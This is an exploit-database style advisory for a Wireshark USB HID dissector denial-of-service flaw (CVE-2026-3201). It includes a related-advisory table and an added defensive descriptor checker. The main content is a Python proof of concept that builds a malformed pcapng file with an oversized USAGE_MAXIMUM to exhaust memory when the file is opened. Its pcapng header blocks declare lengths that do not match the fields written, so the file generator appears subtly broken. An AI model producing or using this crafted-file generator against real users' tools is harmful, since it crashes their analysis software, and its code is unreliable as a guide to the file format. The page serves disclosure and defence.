| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2026-3201 | 25 Feb 2026 14:35 | – | attackerkb |
| AlmaLinux 10 : wireshark (ALSA-2026:9666) | 24 Apr 2026 00:00 | – | nessus |
| Fedora 44 : wireshark (2026-71154797a5) | 26 Mar 2026 00:00 | – | nessus |
| Fedora 42 : wireshark (2026-a92f2096cd) | 15 Mar 2026 00:00 | – | nessus |
| Fedora 43 : wireshark (2026-f7473d3da8) | 15 Mar 2026 00:00 | – | nessus |
| Wireshark 4.4.x < 4.4.14 Multiple Vulnerabilities (macOS) | 5 Mar 2026 00:00 | – | nessus |
| Wireshark 4.4.x < 4.4.15 Multiple Vulnerabilities (macOS) | 1 May 2026 00:00 | – | nessus |
| Wireshark 4.6.x < 4.6.4 Multiple Vulnerabilities (macOS) | 5 Mar 2026 00:00 | – | nessus |
| Wireshark 4.6.x < 4.6.5 Multiple Vulnerabilities (macOS) | 1 May 2026 00:00 | – | nessus |
| openSUSE 16 Security Update : wireshark (openSUSE-SU-2026:20685-1) | 10 May 2026 00:00 | – | nessus |
=============================================================================================================================================
| # Title : Wireshark 4.6.0 to 4.6.3, 4.4.0 to 4.4.13 USB HID Protocol Dissector Memory Exhaustion |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.wireshark.org/ |
=============================================================================================================================================
[+] Summary : CVE-2026-3201 is a Denial-of-Service (DoS) vulnerability affecting the USB HID protocol dissector in Wireshark versions:
    - 4.6.0 through 4.6.3
    - 4.4.0 through 4.4.13
The vulnerability is triggered when Wireshark parses a specially crafted USB HID Report Descriptor containing an excessively large USAGE_MAXIMUM value.
When such a malformed capture file (e.g., PCAPNG with USBPcap link type 249) is opened, the dissector attempts to allocate memory based on the attacker-controlled value.
Due to insufficient bounds checking, this can cause uncontrolled memory growth (e.g., via internal array expansion such as wmem_array_grow()), leading to:
    - Excessive memory consumption
    - Application freeze
    - Application crash
[+] Vulnerability Type : Category: Denial of Service (DoS)
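Added example (not part of the original advisory and not Wireshark's code): a defensive pre-check that walks the short items of a HID report descriptor and flags any USAGE_MINIMUM / USAGE_MAXIMUM pair whose span exceeds a limit, which is the bounds check the summary says is missing. The limit MAX_USAGE_SPAN, the function names and the benign keyboard sample are assumptions made for illustration.

```python
# Assumed policy limit for one usage range; not a value taken from Wireshark.
MAX_USAGE_SPAN = 0xFFFF
DATA_BYTES = (0, 1, 2, 4)                  # bSize code -> payload length
USAGE_MINIMUM, USAGE_MAXIMUM = 0x18, 0x28  # local-item prefixes, size bits cleared

def iter_items(desc):
    """Yield (offset, prefix, value) per short item; ValueError if truncated."""
    i = 0
    while i < len(desc):
        prefix = desc[i]
        if prefix == 0xFE:                 # long item: bDataSize, bLongItemTag, data
            if i + 2 >= len(desc) or i + 3 + desc[i + 1] > len(desc):
                raise ValueError(f"truncated long item at offset {i}")
            i += 3 + desc[i + 1]
            continue
        size = DATA_BYTES[prefix & 0x03]
        data = desc[i + 1:i + 1 + size]
        if len(data) != size:
            raise ValueError(f"truncated item at offset {i}")
        yield i, prefix, int.from_bytes(data, "little")
        i += 1 + size

def oversized_usage_ranges(desc, limit=MAX_USAGE_SPAN):
    """Return [(offset, usage_min, usage_max)] for ranges wider than limit."""
    findings, usage_min = [], 0            # a missing minimum is treated as 0
    for offset, prefix, value in iter_items(desc):
        tag = prefix & 0xFC
        if tag == USAGE_MINIMUM:
            usage_min = value
        elif tag == USAGE_MAXIMUM:
            # Reject descending ranges as well as ranges wider than the limit.
            if not 0 <= value - usage_min <= limit:
                findings.append((offset, usage_min, value))
        elif (prefix >> 2) & 0x03 == 0:    # main item: local state resets
            usage_min = 0
    return findings

# Descriptor bytes as they appear in the PoC on this page.
POC_DESCRIPTOR = bytes.fromhex("05010906a10119002b00000010c0")
# Constructed benign sample: keyboard modifier byte, usages 0xE0..0xE7.
BENIGN_DESCRIPTOR = bytes.fromhex(
    "05 01 09 06 a1 01 05 07 19 e0 29 e7 15 00 25 01 75 01 95 08 81 02 c0")

if __name__ == "__main__":
    for name, d in (("poc", POC_DESCRIPTOR), ("benign", BENIGN_DESCRIPTOR)):
        for off, lo, hi in oversized_usage_ranges(d):
            print(f"{name}: offset {off}: usage range {lo:#x}..{hi:#x} exceeds limit")
```

A parser applying the same rule would reject the descriptor before sizing any buffer from the range.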
[+] POC :
import struct
from scapy.all import *

def generate_perfect_exploit():
    print("[*] Building Refined Malicious USB HID Payload...")
    malicious_hid = (
        b"\x05\x01"              # Usage Page (Generic Desktop)
        b"\x09\x06"              # Usage (Keyboard)
        b"\xa1\x01"              # Collection (Application)
        b"\x19\x00"              # Usage Minimum (0)
        b"\x2b\x00\x00\x00\x10"  # Usage Maximum (0x10000000), 4-byte value
        b"\xc0"                  # End Collection
    )
    header_len = 27
    data_len = len(malicious_hid)
    total_len = header_len + data_len
    usb_header = struct.pack("<H Q H B B B B I",
        header_len,
        0xDEADBEEFCAFEBABE,
        1,
        1,
        0x80,
        0x02,
        ord('C'),
        data_len
    )
    usb_header += b"\x00" * (header_len - len(usb_header))
    full_pkt = usb_header + malicious_hid
    with open("wireshark_usb_dos_fixed.pcapng", "wb") as f:
        f.write(struct.pack("<I I I I Q", 0x0A0D0D0A, 0x1C, 0x1A2B3C4D, 0x00010000, 0xFFFFFFFFFFFFFFFF))
        f.write(struct.pack("<I I H H I", 0x00000001, 0x14, 249, 0, 0x00000000))
        epb_body = struct.pack("<I I I I I", 0, total_len, total_len, 0, 0) + full_pkt
        pad = (4 - (len(epb_body) % 4)) % 4
        epb_total_len = len(epb_body) + 12 + pad
        f.write(struct.pack("<I I", 0x00000006, epb_total_len))  # Type & Total Length
        f.write(epb_body + (b"\x00" * pad))
        f.write(struct.pack("<I", epb_total_len))  # Total Length footer
    print("[!] Success: 'wireshark_usb_dos_fixed.pcapng' generated.")
    print("[*] Logic: USAGE_MAX (0x10000000) will trigger wmem_array_grow() exhaustion.")

if __name__ == "__main__":
    generate_perfect_exploit()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================